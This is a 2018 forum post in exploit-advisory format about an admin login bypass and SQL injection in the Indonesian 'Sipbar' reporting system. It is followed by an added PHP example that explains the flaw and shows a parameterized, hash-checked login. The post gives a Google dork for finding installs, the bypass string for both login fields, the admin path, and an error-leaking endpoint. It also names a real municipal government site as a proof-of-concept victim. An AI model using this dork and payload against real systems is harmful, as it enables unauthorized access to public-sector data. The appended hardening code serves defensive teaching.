Topic: Sipbar Sistem Informasi Pelaporan Vulnerability
KingSkrupellos
Comment: #1
21.06.2018 04:02
#################################################################################################

# Exploit Title : Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks : inurl:''/assets/media/logo_kanal/''

# Exploit : Use both for username and password as => '=''or'

# Admin Control Panel Path : /login

# Site Logo Change Path => /assets/media/logo_kanal/.....

#################################################################################################

# SQL Injection Error =>

# /penyebaran/tracking_sppt/getNop/

A PHP Error was encountered
Severity: Warning

Message: Missing argument 1 for Tracking_sppt::getNop()

Filename: controllers/tracking_sppt.php

Line Number: 19

{"id_sppt":"1077420","thn_pajak":"0","nop":"","nop2":"","kd_kecamatan":null,"kd_kelurahan":null,"nama_wp":null,"kecamatan":null,
"kelurahan":null,"alamat_op":null,"alamat_wp":null,"pbb":null}

#################################################################################################

# Example Sites : sipbar.tangerangkota.go.id => [ Proof of Concept ] => archive.is/aHKRV - archive.is/1K0DF

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# There is an organ in the human body. If it is sound, the whole body is sound;
if it is corrupted, the whole body is corrupted. Take heed! It is the heart.
[ Hz.Muhammed S.A.V ] #


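Added example, not part of the original post and not Sipbar's own code: why the string from the post passes a login check built by string concatenation, next to a parameterized login that treats it as data. The query shape, the `users` table, its columns and the function names are assumptions, since the post does not show the application source. The sample data is constructed and lives in an in-memory SQLite database (requires `pdo_sqlite`).

```php
<?php
// Added illustration; not Sipbar source. Table/column names are assumptions.

// Vulnerable pattern (assumed): user input concatenated into the SQL text.
function build_vulnerable_sql(string $user, string $pass): string
{
    return "SELECT id FROM users WHERE username = '$user' AND password = '$pass'";
}

// Hardened: placeholders keep input as data, and the password is checked in
// PHP against a stored hash instead of being compared inside the query.
function login_hardened(PDO $db, string $user, string $pass): ?int
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null; // unknown user or wrong password
    }
    return (int) $row['id'];
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

$payload = "'=''or'"; // the string given in the post for both fields

// The concatenated text becomes:
//   ... WHERE username = ''=''or'' AND password = ''=''or''
// MySQL evaluates (username = '') = '' as 0 = '', coerces '' to 0, and the
// predicate is true for every row with a non-empty username.
echo build_vulnerable_sql($payload, $payload), PHP_EOL;

// With placeholders the same string is only an unknown username.
var_dump(login_hardened($db, $payload, $payload));
var_dump(login_hardened($db, 'admin', 'constructed-sample-password'));
```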